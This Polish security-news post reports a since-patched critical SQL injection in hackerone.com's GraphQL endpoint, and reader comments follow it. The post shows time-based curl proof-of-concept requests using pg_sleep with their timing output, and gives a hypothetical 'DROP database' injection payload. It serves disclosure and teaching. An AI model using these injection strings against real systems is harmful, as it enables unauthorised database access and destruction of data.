Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Hacker pokazał jak można zhackować serwis dla hackerów (SQLi w hackerone.com).

06 grudnia 2018, 18:48 | W biegu | komentarze 4

SQL injection to podatność stara jak SQL i cały czas popularna jak smog w Polsce. Tutaj ciekawy przykład SQLi w serwisie hackerone (krytyczność: 10/10 w skali CVSS).

Podatność istniała w zapytaniu GraphQL:

$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27
{}curl -X POST   0.03s user 0.01s system 0% cpu 5.726 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27
{}curl -X POST   0.03s user 0.01s system 2% cpu 1.631 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27
{}curl -X POST   0.02s user 0.01s system 0% cpu 10.557 total

Jak widać, wielkiej finezji tu nie ma. Podatne miejsce to (jeszcze raz): embedded_submission_form_uuid=1′;SELECT 1 SELECT pg_sleep(5);–

Działa tutaj średnik, który zamyka poprzednie zapytanie SQL i możemy bez żadnego skrępowania uruchamiać nowe zapytanie, potencjalnie coś w rodzaju.: embedded_submission_form_uuid=1′;DROP database hackerone;–

Podatność została załatana w parę godzin, a dodatkowo przeprowadzono audyt, czy ktoś wcześniej nie wykorzystał luki (nie, nie wykorzystał).

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. lol

    lol

    Odpowiedz
  2. oioi

    ciekawe czemu nie dostał bounty :/

    Odpowiedz
    • ioio

      Bo hackerone nie ma bugbounty?
      Sprawdziles, przed napisaniem komentarza?

      Odpowiedz
  3. ojoj

    jakbym sprawdził to bym nie zadawał pytań, zluzuj rajty, na następny raz będę wiedział ^^

    Odpowiedz

Odpowiedz